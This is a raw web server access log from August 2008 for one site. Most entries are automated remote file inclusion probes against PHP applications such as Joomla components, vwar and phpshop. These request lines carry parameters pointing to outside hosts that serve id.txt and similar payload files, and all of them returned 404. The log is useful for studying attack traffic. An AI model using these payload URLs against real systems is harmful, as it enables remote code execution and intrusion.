209.62.24.242 - - [07/Aug/2008:11:48:18 -0700] "GET /logs/access_080224.log/errors.php?error=http://www.madmikesradio.net/PG/gallery/albums/userpics/themes.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.133.215.166 - - [07/Aug/2008:11:48:21 -0700] "GET /logs/access_080218.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.133.215.166 - - [07/Aug/2008:11:48:22 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.133.215.166 - - [07/Aug/2008:11:48:23 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.10.140.162 - - [07/Aug/2008:11:48:53 -0700] "GET /logs/access_080316.log/!scan3http://www.dijon-plomberie.com/tmp/cmdp.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.24.222 - - [07/Aug/2008:11:49:09 -0700] "GET /logs/store//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.24.222 - - [07/Aug/2008:11:49:09 -0700] "GET /store//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.24.222 - - [07/Aug/2008:11:49:25 -0700] "GET /logs/access_080216.log/store//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.24.222 - - [07/Aug/2008:11:49:26 -0700] "GET /store//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.24.222 - - [07/Aug/2008:11:49:26 -0700] "GET /logs/store//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.203.223.93 - - [07/Aug/2008:11:49:54 -0700] "GET /logs/access_080209.log//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
88.168.106.155 - - [07/Aug/2008:11:49:55 -0700] "GET /logs/access_080124.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.italsoft.net/assistenza/za.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.93 - - [07/Aug/2008:11:49:55 -0700] "GET /logs/access_080209.log/errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:11:50:15 -0700] "GET //oneadmin/photogallery/include.php?path[docroot]=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
89.238.65.54 - - [07/Aug/2008:11:50:15 -0700] "GET /errors.php?error=http://cr4nk.wrz.be/cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
74.6.17.183 - - [07/Aug/2008:11:50:41 -0700] "GET /logs/access.log HTTP/1.0" 200 353077 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
208.82.247.252 - - [07/Aug/2008:11:50:47 -0700] "GET /logs///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.82.247.252 - - [07/Aug/2008:11:50:47 -0700] "GET /logs/access_080131.log///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.82.247.252 - - [07/Aug/2008:11:50:47 -0700] "GET /logs/access_071225.log///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.82.247.252 - - [07/Aug/2008:11:50:47 -0700] "GET ///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.133.215.166 - - [07/Aug/2008:11:50:49 -0700] "GET /logs/access_080329.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.24.222 - - [07/Aug/2008:11:51:15 -0700] "GET /logs/access_080117.log/store//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.34.166.20 - - [07/Aug/2008:11:51:41 -0700] "GET /logs/access_080219.log///vwar/backup/errors.php?error=http://afe.la/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.166.20 - - [07/Aug/2008:11:51:41 -0700] "GET ///vwar/backup/errors.php?error=http://afe.la/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.166.20 - - [07/Aug/2008:11:51:41 -0700] "GET /logs///vwar/backup/errors.php?error=http://afe.la/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.50.0.218 - - [07/Aug/2008:11:51:45 -0700] "GET /includes/phpdig/includes/config.php?relative_script_path=http://www.kograko.com.pl/poll/polldata/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.243.103.28 - - [07/Aug/2008:11:51:49 -0700] "GET /logs/access_080218.log HTTP/1.1" 200 458752 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
151.201.104.11 - - [07/Aug/2008:11:52:01 -0700] "GET /logs/access_080124.log HTTP/1.1" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
64.34.166.20 - - [07/Aug/2008:11:52:10 -0700] "GET /logs/access_080218.log///vwar/backup/errors.php?error=http://afe.la/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.24.222 - - [07/Aug/2008:11:52:55 -0700] "GET /logs/access.log//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.24.222 - - [07/Aug/2008:11:52:55 -0700] "GET //plugins/safehtml/HTMLSax3.php?dir[plugins]=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.24.222 - - [07/Aug/2008:11:52:56 -0700] "GET /logs//plugins/safehtml/HTMLSax3.php?dir[plugins]=http://vds260.sivit.org/newsletter//inc/mailer/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.158.221.227 - - [07/Aug/2008:11:53:04 -0700] "GET /logs/access_080114.log HTTP/1.1" 200 327680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:11:53:31 -0700] "GET /logs/access_080114.log//page/vwar//convert/mvcw.php?step=1&vwar_root=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:11:53:32 -0700] "GET /logs/access_080114.log//page/vwar//convert/mvcw.php?step=1&vwar_root=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:11:53:32 -0700] "GET //page/vwar//convert/mvcw.php?step=1&vwar_root=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:11:53:32 -0700] "GET //page/vwar//convert/mvcw.php?step=1&vwar_root=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.33.173.20 - - [07/Aug/2008:11:53:40 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 667419 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
201.59.146.243 - - [07/Aug/2008:11:53:42 -0700] "GET /logs/access_080120.log HTTP/1.0" 200 262144 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
74.6.17.183 - - [07/Aug/2008:11:53:48 -0700] "GET /bikes/dteel/2008_02_08/?S=A HTTP/1.0" 200 1116 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:11:53:52 -0700] "GET /logs/access_080114.log//page/vwar//convert/mvcw.php?step=1&vwar_root=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:11:53:53 -0700] "GET //page/vwar//convert/mvcw.php?step=1&vwar_root=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:11:53:53 -0700] "GET /logs//page/vwar//convert/mvcw.php?step=1&vwar_root=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:11:53:56 -0700] "GET /logs/access_080114.log//page/vwar//convert/mvcw.php?step=1&vwar_root=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:11:53:56 -0700] "GET //page/vwar//convert/mvcw.php?step=1&vwar_root=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:11:53:57 -0700] "GET /logs/access_080131.log//page/vwar//convert/mvcw.php?step=1&vwar_root=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:11:53:57 -0700] "GET /logs/access_080131.log//page/vwar//convert/mvcw.php?step=1&vwar_root=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:11:53:57 -0700] "GET /logs//page/vwar//convert/mvcw.php?step=1&vwar_root=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:11:54:05 -0700] "GET //page/vwar//convert/mvcw.php?step=1&vwar_root=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:11:54:06 -0700] "GET //page/vwar//convert/mvcw.php?step=1&vwar_root=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.168.106.155 - - [07/Aug/2008:11:54:19 -0700] "GET /logs/access_080118.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.italsoft.net/assistenza/za.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.177.157.197 - - [07/Aug/2008:11:54:28 -0700] "GET /logs/access_080130.log HTTP/1.0" 200 458752 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:11:54:34 -0700] "GET /logs/access_080131.log//page/vwar//convert/mvcw.php?step=1&vwar_root=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.25.133.94 - - [07/Aug/2008:11:54:41 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://test.rollespil.dk/joomla/templates/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.133.94 - - [07/Aug/2008:11:54:41 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://test.rollespil.dk/joomla/templates/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.133.94 - - [07/Aug/2008:11:54:41 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://test.rollespil.dk/joomla/templates/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
79.37.236.150 - - [07/Aug/2008:11:54:51 -0700] "GET /logs/access_080127.log//convert/mvcw.php?step=1&vwar_root=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.71.178.6 - - [07/Aug/2008:11:54:53 -0700] "GET /logs/access.log/indexhttp://www.naturopathic.org/images/bulletins/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
79.37.236.150 - - [07/Aug/2008:11:54:54 -0700] "GET //convert/mvcw.php?step=1&vwar_root=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.220.208.60 - - [07/Aug/2008:11:54:54 -0700] "GET /indexhttp://www.naturopathic.org/images/bulletins/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
79.37.236.150 - - [07/Aug/2008:11:54:54 -0700] "GET /logs//convert/mvcw.php?step=1&vwar_root=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.220.208.60 - - [07/Aug/2008:11:54:55 -0700] "GET /logs/indexhttp://www.naturopathic.org/images/bulletins/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:11:55:05 -0700] "GET /logs/access_080131.log//page/vwar//convert/mvcw.php?step=1&vwar_root=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:11:55:06 -0700] "GET /logs//page/vwar//convert/mvcw.php?step=1&vwar_root=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:11:55:06 -0700] "GET /logs//page/vwar//convert/mvcw.php?step=1&vwar_root=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:11:55:07 -0700] "GET //page/vwar//convert/mvcw.php?step=1&vwar_root=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:11:55:07 -0700] "GET //page/vwar//convert/mvcw.php?step=1&vwar_root=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:11:55:08 -0700] "GET /logs//page/vwar//convert/mvcw.php?step=1&vwar_root=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:11:55:09 -0700] "GET /logs//page/vwar//convert/mvcw.php?step=1&vwar_root=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:11:55:09 -0700] "GET //page/vwar//convert/mvcw.php?step=1&vwar_root=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.253.223.90 - - [07/Aug/2008:11:55:09 -0700] "GET //page/vwar//convert/mvcw.php?step=1&vwar_root=http://www.ds5vxk.com/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:11:55:25 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:11:55:25 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:11:55:25 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
88.248.147.7 - - [07/Aug/2008:11:55:36 -0700] "GET /logs/access_080120.log HTTP/1.0" 200 458752 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:11:55:46 -0700] "GET /logs/access_080127.log/convert/mvcw.php?vwar_root=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:11:55:46 -0700] "GET /convert/mvcw.php?vwar_root=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:11:55:46 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:11:55:55 -0700] "GET /logs/access_080114.log/convert/mvcw.php?vwar_root=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:11:56:35 -0700] "GET /logs/access_080211.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:11:56:35 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:11:56:35 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:11:56:42 -0700] "GET /logs/access_080110.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
79.37.236.150 - - [07/Aug/2008:11:56:44 -0700] "GET /logs/access_080219.log//convert/mvcw.php?step=1&vwar_root=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.133.94 - - [07/Aug/2008:11:58:01 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://test.rollespil.dk/joomla/templates/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.133.94 - - [07/Aug/2008:11:58:01 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://test.rollespil.dk/joomla/templates/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.133.94 - - [07/Aug/2008:11:58:03 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://test.rollespil.dk/joomla/templates/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.236.10.71 - - [07/Aug/2008:11:58:08 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.telefranz.de/images/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.8.232.250 - - [07/Aug/2008:11:58:28 -0700] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 401 395 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.dmulk.com"
68.8.232.250 - warboard [07/Aug/2008:11:58:31 -0700] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 200 33037 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.dmulk.com"
68.8.232.250 - warboard [07/Aug/2008:11:58:32 -0700] "GET /warboard/css/styles_screen.css HTTP/1.1" 304 - "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.dmulk.com"
68.8.232.250 - warboard [07/Aug/2008:11:58:32 -0700] "GET /warboard/css/styles_print.css HTTP/1.1" 304 - "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.dmulk.com"
68.8.232.250 - warboard [07/Aug/2008:11:58:32 -0700] "GET /warboard/images/delete.gif HTTP/1.1" 304 - "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.dmulk.com"
68.8.232.250 - warboard [07/Aug/2008:11:58:32 -0700] "GET /warboard/images/update.gif HTTP/1.1" 304 - "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.dmulk.com"
68.8.232.250 - warboard [07/Aug/2008:11:58:32 -0700] "GET /warboard/images/details.gif HTTP/1.1" 304 - "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "www.dmulk.com"
88.168.106.155 - - [07/Aug/2008:11:58:47 -0700] "GET /logs/access_080125.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.italsoft.net/assistenza/za.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.168.106.155 - - [07/Aug/2008:11:58:59 -0700] "GET /logs/access_080103.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.italsoft.net/assistenza/za.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.122.47.166 - - [07/Aug/2008:11:59:21 -0700] "GET /logs/access_080302.log//postscript.php?p_mode=http://www.ghareng.com/alat/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.122.47.166 - - [07/Aug/2008:11:59:21 -0700] "GET //postscript.php?p_mode=http://www.ghareng.com/alat/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.122.47.166 - - [07/Aug/2008:11:59:21 -0700] "GET /logs/access_080302.log//postscript.php?p_mode=http://www.ghareng.com/alat/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.122.47.166 - - [07/Aug/2008:11:59:21 -0700] "GET /logs//postscript.php?p_mode=http://www.ghareng.com/alat/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.122.47.166 - - [07/Aug/2008:11:59:22 -0700] "GET //postscript.php?p_mode=http://www.ghareng.com/alat/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.122.47.166 - - [07/Aug/2008:11:59:22 -0700] "GET /logs//postscript.php?p_mode=http://www.ghareng.com/alat/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.60.155.3 - - [07/Aug/2008:11:59:33 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
211.60.155.3 - - [07/Aug/2008:11:59:36 -0700] "GET ///vwar/backup/errors.php?error=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:11:59:42 -0700] "GET /logs/access_080311.log%20//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
80.93.62.114 - - [07/Aug/2008:11:59:58 -0700] "GET /logs/access_080302.log/postscript.php?p_mode=http://onepieceknitting.com/modules/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.114 - - [07/Aug/2008:11:59:58 -0700] "GET /postscript.php?p_mode=http://onepieceknitting.com/modules/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.93.62.114 - - [07/Aug/2008:11:59:59 -0700] "GET /logs/postscript.php?p_mode=http://onepieceknitting.com/modules/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.115.34.17 - - [07/Aug/2008:12:00:07 -0700] "GET /logs/access_080302.log//postscript.php?p_mode=http://www.ghareng.com/alat/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
208.115.34.17 - - [07/Aug/2008:12:00:07 -0700] "GET //postscript.php?p_mode=http://www.ghareng.com/alat/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
208.115.34.17 - - [07/Aug/2008:12:00:08 -0700] "GET /logs//postscript.php?p_mode=http://www.ghareng.com/alat/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
217.18.75.8 - - [07/Aug/2008:12:00:12 -0700] "GET /logs/access_080127.log//bemarket/postscript/postscript.php?p_mode=http://manga-scan.siteburg.com/dd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.252.149.15 - - [07/Aug/2008:12:00:36 -0700] "GET /presto/ HTTP/1.1" 200 526 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)" "www.dmulk.com"
208.122.47.166 - - [07/Aug/2008:12:00:55 -0700] "GET /logs//postscript.php?p_mode=http://www.ghareng.com/alat/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
